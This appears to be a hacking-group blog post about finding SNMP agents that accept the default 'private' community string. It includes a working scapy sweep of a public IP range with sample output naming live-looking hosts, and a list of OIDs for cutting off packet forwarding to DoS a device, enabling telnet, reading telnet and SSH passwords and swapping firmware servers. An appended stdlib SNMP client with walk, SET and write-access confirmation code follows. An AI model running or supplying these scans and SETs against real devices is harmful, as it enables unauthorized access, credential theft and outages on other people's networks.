At the last meeting dw5304 gave a demo on SNMP scanning and gaining access to things you shouldn't have access to with a few home-brew Windows apps he coded up. It's been a while since I messed with SNMP, but his demo got me back into it, so I made a little Python script to scan subnets for open SNMP agents that answer to the community string "private" (the usual default read/write string). Here is the code:
#! /usr/bin/env python
from scapy.all import *

base = "69.2.1."  # IP range to scan minus the last octet
sysdescr = "1.3.6.1.2.1.1.1.0"  # sysDescr.0

with open('/tmp/snmp_output.txt', 'w+') as f:
    for i in range(1, 255):
        ip = base + str(i)
        print(ip)
        # SNMPv1 GET for sysDescr.0 using the community string "private"
        p = IP(dst=ip)/UDP(dport=161, sport=39445)/SNMP(community="private",
                PDU=SNMPget(id=1416992799, varbindlist=[SNMPvarbind(oid=ASN1_OID(sysdescr))]))
        pkt = sr1(p, timeout=1, verbose=0)
        # sr1() also hands back ICMP port-unreachable replies, so require an SNMP layer with a
        # varbind and read the value from the parsed packet instead of splitting sprintf() output
        if pkt and pkt.haslayer(SNMP) and pkt[SNMP].PDU.varbindlist:
            val = pkt[SNMP].PDU.varbindlist[0].value.val
            if isinstance(val, bytes):
                val = val.decode('latin-1')
            line = pkt[IP].src + " - " + str(val)
            print(line)
            f.write(line + "\n")

print("\nDONE!!!!!!!!!!!!!!!\n")
It's a little hacked together and could use improvement, but it works (feel free to send in any improvements you make). It puts the IPs of all the agents found in /tmp/snmp_output.txt along with their system description (sysDescr.0) enumerated via SNMP. One caveat: a reply to a GET only proves the agent accepts "private" for reads; to confirm it really is the read/write string, do an snmpset (for example, set sysContact.0 to its current value) and check that the agent answers without an error instead of timing out. Here is a sample output:
69.1.117.87 - Ruckus Wireless Inc (C) 2006
69.1.117.156 - Ruckus Wireless Inc (C) 2006
69.1.117.190 - Ruckus Wireless Inc (C) 2006
69.1.117.193 - Ruckus Wireless Inc (C) 2006
69.1.117.203 - Ruckus Wireless Inc (C) 2006
69.1.117.221 - Ruckus Wireless Inc (C) 2006
69.1.163.92 - 24-port 10/100 + 2-Port Gigabit Switch with WebView and PoE
69.1.163.93 - Product: GW 4 FXS;SW Version: 5.80A.023.006
Once you find a few agents you can run snmpwalk against them and scour the output for juicy info.
Here are some good OIDs to look for and/or set (I found most of this online and got some from dw5304):
ip.ipForwarding.0 <- tells you whether it is forwarding packets or not (setting it is useful to DoS a device)
1.3.6.1.2.1.4.24.2.1.1 <- ipForwardDest
sysName.0 <- device name
1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0 i 1 = EnableTelnetServer (snmpset type i, value 1)
1.3.6.1.4.1.4413.2.2.2.1.1.1.1.0 = telnetIpStackInterfaces
1.3.6.1.4.1.4413.2.2.2.1.1.1.2.0 = telnetUserName
1.3.6.1.4.1.4413.2.2.2.1.1.1.3.0 = telnetPassword
1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0 = telnetServerControl
1.3.6.1.4.1.4413.2.2.2.1.1.1.5.0 = telnetSessionIp
1.3.6.1.4.1.4413.2.2.2.1.1.1.6.0 = telnetSessionInProgress
1.3.6.1.4.1.4413.2.2.2.1.1.1.7.0 = telnetForceUserLogout
1.3.6.1.2.1.1.1.0 = System Description
1.3.6.1.2.1.1.3.0 = Modem up time
1.3.6.1.2.1.4 = Some useful information (walk)
1.3.6.1.2.1.4.20.1.1.0 = HFC IP (getnext)
1.3.6.1.2.1.4.20.1.3.0 = HFC Subnet (getnext)
1.3.6.1.2.1.2.2.1.6.2 = MAC
1.3.6.1.2.1.10.127.1.1.3.1.3.1 = Maximum upload bandwidth
1.3.6.1.2.1.10.127.1.1.3.1.5.1 = Maximum download bandwidth
1.3.6.1.2.1.10.127.1.1.4.1 = Current status (walk)
1.3.6.1.2.1.17.4.3.1.1.0 = Hosts behind modem
1.3.6.1.2.1.69.1.4.4.0 = TFTP Configuration file server IP
1.3.6.1.2.1.69.1.4.5.0 = Configuration file name
1.3.6.1.2.1.69.1.3.5.0 = Current firmware
1.3.6.1.2.1.69.1.4.2.0 = DHCP Server IP
1.3.6.1.2.1.69.1.4.3.0 = Time Server IP
1.3.6.1.2.1.69.1.5.8.1.7 = View Log (walk)
1.3.6.1.2.1.10.127.1.1.1.1.2.3 = Downstream Frequency
1.3.6.1.2.1.69.1.4.5.0 = Image File
1.3.6.1.2.1.17.4.3.1.1 = Learned MAC (Get Next)
---[ Read / Write OIDs
1.3.6.1.2.1.69.1.1.3.0 = Boot modem (1=boot now)
1.3.6.1.2.1.69.1.3.1.0 = TFTP Firmware server IP
1.3.6.1.2.1.69.1.3.2.0 = Firmware filename
1.3.6.1.2.1.69.1.3.3.0 = Firmware update status (1=update now, 2=update on boot,3=disable updates)
1.3.6.1.2.1.69.1.5.2.0 = SNMP Traps server IP (0.0.0.0 = disabled)
1.3.6.1.2.1.69.1.5.3.0 = SNMP Traps status (1=enabled, 4=disabled)
1.3.6.1.4.1.1166.1.19.3.1.14.0 = SNMP Port
1.3.6.1.4.1.1166.1.19.3.1.15.0 = SNMP Traps port
1.3.6.1.4.1.1166.1.19.3.1.17.0 = HTML Server status (1=enabled, 2=disabled)
---[ Other OIDs
1.3.6.1.2.1.1.5.0 = modem type
1.3.6.1.3.83.1.1.4.0 = Cable Modem Serial Number
1.3.6.1.3.83.1.4.5.0 = Alternate OID for Config File
1.3.6.1.3.83.1.4.3.0 = Provisional Server
1.3.6.1.2.1.1.6.0 = Area String
1.3.6.1.2.1.4.20.1.3 + (hfc ip) = Subnet. Example: 1.3.6.1.2.1.4.20.1.3.10.169.53.245
1.3.6.1.3.103.1.5.1.3.1.5 = CPE USB MAC
1.3.6.1.2.1.2.2.1.6.1 = Cable Modem USB MAC
1.3.6.1.2.1.10.127.1.2.1.1.1.2 = Default Gateway MAC Address
1.3.6.1.2.1.10.127.1.1.3.1.6.1 = Max Burst Up
1.3.6.1.2.1.2.2.1.6.5 = CPE MAC
1.3.6.1.4.1.1166.1.19.3.1.17.0 i 1 or 0 = enable or disable webif
1.3.6.1.4.1.4413.2.2.2.1.1.4.1 = "reflects the IP stack interfaces on which a ssh"
1.3.6.1.4.1.4413.2.2.2.1.1.4.2 = "reflects the user name which will be allowed ssh access."
1.3.6.1.4.1.4413.2.2.2.1.1.4.3 = "reflects the password which will be allowed ssh access."
1.3.6.1.4.1.4413.2.2.2.1.1.4.4 = "start or stop the ssh server."
1.3.6.1.4.1.4413.2.2.2.1.1.4.7 = terminate ssh session
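Here is an added example (not the post's script and not dw5304's tools) that shows what snmpwalk and snmpset actually put on the wire, and the check that turns a "private" hit from the scanner above into proof of write access. It is a stdlib-only SNMPv1 implementation (no scapy, no net-snmp) plus a constructed fake agent so it runs offline; fake_agent, SAMPLE_MIB, the contact string and the "public"/"private" strings on the fake device are assumptions made for the demo, while the sysDescr text is the switch line from the scan output and the OIDs are the standard sysDescr.0, sysContact.0 and ipForwarding.0 from the list above.

```python
# SNMPv1 over BER in stdlib-only Python: build GET/GETNEXT/SET, decode the Response, walk a subtree and
# prove a community is really read/write.  Transport is any send(datagram) -> bytes or None (timeout).
GET, GETNEXT, RESPONSE, SET = 0xA0, 0xA1, 0xA2, 0xA3
def tlv(tag, body):                                  # BER: tag, definite-form length, contents
    n = len(body)
    lb = b'' if n < 0x80 else n.to_bytes((n.bit_length() + 7) // 8, 'big')
    return bytes([tag, n if n < 0x80 else 0x80 | len(lb)]) + lb + body
def enc_int(v):                                      # INTEGER: two's complement, shortest form
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, 'big', signed=True))
def enc_oid(oid):                                    # OBJECT IDENTIFIER: base-128 sub-identifiers
    p = [int(x) for x in oid.split('.')]
    out = [40 * p[0] + p[1]]
    for n in p[2:]:
        chunk = [n & 0x7F]
        while n := n >> 7: chunk.append(0x80 | (n & 0x7F))
        out += reversed(chunk)
    return tlv(0x06, bytes(out))
def enc_value(v):                                    # NULL in requests; INTEGER / OCTET STRING for data
    return b'\x05\x00' if v is None else enc_int(v) if isinstance(v, int) else tlv(0x04, v.encode('latin-1'))

def read_tlv(buf, pos=0):                            # -> (tag, contents, offset just past the TLV)
    tag, n, pos = buf[pos], buf[pos + 1], pos + 2
    if n & 0x80:                                     # long form: low 7 bits = number of length bytes
        n, pos = int.from_bytes(buf[pos:pos + (n & 0x7F)], 'big'), pos + (n & 0x7F)
    return tag, buf[pos:pos + n], pos + n
def items(buf, pos=0):                               # every (tag, contents) inside a SEQUENCE body
    while pos < len(buf):
        tag, body, pos = read_tlv(buf, pos)
        yield tag, body
def dec_value(tag, body):
    if tag in (0x02, 0x41, 0x42, 0x43):              # INTEGER is signed; Counter32/Gauge32/TimeTicks are not
        return int.from_bytes(body, 'big', signed=tag == 0x02)
    if tag == 0x04: return body.decode('latin-1')
    if tag == 0x06:
        parts, n = [body[0] // 40, body[0] % 40], 0
        for c in body[1:]:
            n = (n << 7) | (c & 0x7F)
            if not c & 0x80: parts, n = parts + [n], 0
        return '.'.join(map(str, parts))
    return None                                      # NULL, noSuchObject, anything unhandled

def encode_msg(community, pdu_tag, req_id, varbinds, err=0, idx=0):
    # Message ::= SEQUENCE { version 0, community, [pdu_tag] { req-id, err-status, err-index, varbinds } }
    vbl = b''.join(tlv(0x30, enc_oid(o) + enc_value(v)) for o, v in varbinds)
    pdu = tlv(pdu_tag, enc_int(req_id) + enc_int(err) + enc_int(idx) + tlv(0x30, vbl))
    return tlv(0x30, enc_int(0) + enc_value(community) + pdu)
def decode_msg(buf):
    (_, _ver), (_, comm), (pdu_tag, pdu) = items(read_tlv(buf)[1])
    (_, rid), (_, es), (_, ei), (_, vbl) = items(pdu)
    varbinds = [(dec_value(*o), dec_value(*v)) for o, v in (items(vb) for _, vb in items(vbl))]
    return {'community': comm.decode('latin-1'), 'pdu': pdu_tag, 'req_id': dec_value(2, rid),
            'error_status': dec_value(2, es), 'error_index': dec_value(2, ei), 'varbinds': varbinds}

def oid_key(oid):                                    # tree (lexicographic) order of an OID
    return tuple(int(x) for x in oid.split('.'))
def snmp_set(send, community, oid, value, req_id=2):  # -> True only for a clean Response
    resp = send(encode_msg(community, SET, req_id, [(oid, value)]))
    return resp is not None and decode_msg(resp)['error_status'] == 0
def snmp_walk(send, community, root, req_id=3):
    # GETNEXT loop; ends on timeout, on error-status 2 (noSuchName, a v1 agent's "end of MIB"),
    # or when the answer leaves the subtree or fails to advance.
    results, cur = [], root
    while (resp := send(encode_msg(community, GETNEXT, req_id, [(cur, None)]))) is not None:
        m = decode_msg(resp)
        if m['req_id'] != req_id or m['error_status'] != 0:
            break
        oid, val = m['varbinds'][0]
        if oid_key(oid) <= oid_key(cur) or oid_key(oid)[:len(oid_key(root))] != oid_key(root):
            break
        results.append((oid, val))
        cur, req_id = oid, req_id + 1
    return results
def confirm_read_write(send, community, oid='1.3.6.1.2.1.1.4.0'):
    # A GET answered with "private" only proves the string is accepted for reads; to prove writes
    # without changing the box, SET sysContact.0 to its current value and require a clean Response.
    resp = send(encode_msg(community, GET, 1, [(oid, None)]))
    current = decode_msg(resp)['varbinds'][0][1] if resp else None
    return current is not None and snmp_set(send, community, oid, current)

def fake_agent(mib, ro='public', rw='private'):
    # Constructed stand-in for a device (one varbind per request, all this client sends).  Like a real
    # v1 agent it silently drops a request whose community is not allowed for that PDU type.
    mib = dict(mib)
    def handle(datagram):
        m = decode_msg(datagram)
        if m['community'] not in ((rw,) if m['pdu'] == SET else (ro, rw)):
            return None                              # dropped: the client sees a timeout
        oid, val = m['varbinds'][0]
        if m['pdu'] == GETNEXT:                      # first OID after `oid` in tree order
            oid = min((o for o in mib if oid_key(o) > oid_key(oid)), key=oid_key, default=None)
        if oid not in mib:                           # noSuchName (also how a v1 walk hits the end)
            return encode_msg(m['community'], RESPONSE, m['req_id'], m['varbinds'], 2, 1)
        if m['pdu'] == SET: mib[oid] = val
        return encode_msg(m['community'], RESPONSE, m['req_id'], [(oid, mib[oid])])
    return handle
SAMPLE_MIB = {                                       # constructed; modelled on the switch in the scan output
    '1.3.6.1.2.1.1.1.0': '24-port 10/100 + 2-Port Gigabit Switch with WebView and PoE',  # sysDescr
    '1.3.6.1.2.1.1.4.0': 'noc@example.net',          # sysContact
    '1.3.6.1.2.1.4.1.0': 2,                          # ipForwarding: 1 = forwarding, 2 = notForwarding
}
```

With send = fake_agent(SAMPLE_MIB), snmp_walk(send, 'public', '1.3.6.1.2.1.1') returns the two system.* objects and stops when the agent's answer crosses into 1.3.6.1.2.1.4, which is exactly what snmpwalk -v1 -c public does for "system". confirm_read_write(send, 'public') is False and confirm_read_write(send, 'private') is True: the SET with the read-only string is simply dropped, and that timeout (not an error reply) is what a real v1 agent gives you too, so the scanner's GET hit alone never settles the question. Against a real device, send() is a UDP sendto to port 161 followed by recvfrom with a timeout that returns None on socket.timeout; snmp_set(send, 'private', '1.3.6.1.2.1.4.1.0', 2) is then the ipForwarding flip the list above mentions.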
You can find a lot more online. Enjoy and happy hacking :)